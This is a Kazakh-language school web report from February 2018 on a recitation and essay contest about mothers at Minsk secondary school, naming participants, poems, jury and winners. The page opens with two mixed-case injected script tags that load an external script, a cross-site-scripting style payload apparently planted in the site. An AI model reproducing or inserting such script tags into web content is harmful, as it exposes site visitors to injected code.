<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

10.02.2018

«Алтын жүрек ана», «Сердце, наполненное любовью» мәнерлеп

оқу сайысының ЕСЕБІ.

2017 – 2018 оқу жылы

 

«Өзін – өзі тану:

Махаббат пен Шығармашылық педагогикасы» дәстүрлі онкүндігі аясында 06.02.2018 жылы Минск орта мектебінде

5-9 – сыныптар арасында «Алтын жүрек ана», «Сердце, наполненное любовью»

оқырмандар конкурсы өткізілді. Балалар конурсқа жақсы дайындалып, аналарының

суреттерін әкелді. Қатысқан оқушылар саны: 13, қатысқан мұғалімдер:10. Конурсқа

мектеп директоры Хадыр М., оқу – тәрбие ісінің меңгерушісі Тилеухан С., тарих

пәнінің мұғалімі Ожай А., әділқазылар болды.

 Байқауға жетекшілік етіп отырған, қазақ тілі

мен әдебиет пәнінің мұғалімі Бодан Аскергүлдің «Алтын жүректі – АНА» тақырыбында

баяндама оқыды. Өзін –өзі тану пәнінің мұғалімі Сағит Оразкүл А. Құнанбайұлының

«Иузи – раушан, көзі - гәуһар» атты өлеңімен, мәнерлеп оқу байқауын бастады.

Оқушылар «Ана туралы, мейірімділік пен достық туралы өлеңдер оқыды. Балалар мәнерлеп оқу, шығарма,

эссе, авторлық өлеңдер аталымы бойынша белсенді қатысты.

 Атап айтар болсақ:

1. Алмабек Али 5-сынып. Ә. Дүйсенбеев «Ана»;

2. Мұратбек Шұғыла 6-сынып, Қ. Мырза Әли «Бәрі де Ана»;

3. Блатаева Аяна 6-сынып, М. Шаханов « Төрт ана»;

4. Хуанышбек Шынар 7-сынып, Ф. Оңғарсынова «Ана»;

5. Блатаева Аяна 5-сынып, Қ. Мырза Әли «Ана»;

7. Хакова Дильназ 7-сынып, Ю. Началова  «Мама»;

8. Еркебұлан Айша 8-сынып, А. Байтұрсынов «Анама хат»;

9. Ермек Ботажан 8-сынып, М. Мақатаев «Ана сен бақыттысың».

Аталған оқушылар мәнерлеп оқу бойынша жарысқа түссе, өз

шығармашылығы мен эссе жазу бойынша төменде көрсетілген оқушылар өз біліктіліктерін

сынады.

1.  Бекеш Амира 5-сынып.

2.  Байбекова Жанель 5 – сынып.

3.  Блатаева Аяна 6-сынып.

4   Хуанышбек Шынар 7-сынып.

5.   Жарденбек Нұрболат 7 – сынып.

6.   Жанарбек Ақжол 8 – сынып.

7.  Жанарбек Арайлым 6 – сынып.

Байқаудың ерекшілігі: өлеңдер ерекше мейіріммен және жылулықпен оқылды. Байқаудың жеңімпаздары анықталды: мәнерлеп оқу сайысы бойынша Мұратбек Ш. І орын, Еркебұлан Айша ІІ орын, Ермек Ботажан ІІІ орын иеленді. Өз шығармашылығы бойынша Блатаева Аяна І орын, Хуанышбек Шынар ІІ орын, Жанарбек Ақжол ІІІ орынды иеленіп жүзден жүйрік деп танылды.

 

 

 

  Қазақ тілі мен әдебиет пәнінің мұғалімі:   Бодан А

 

  

 

 

    

 

 

Просмотров: 1509


Пікір қосу



Деректерді қолтаңбаға қосу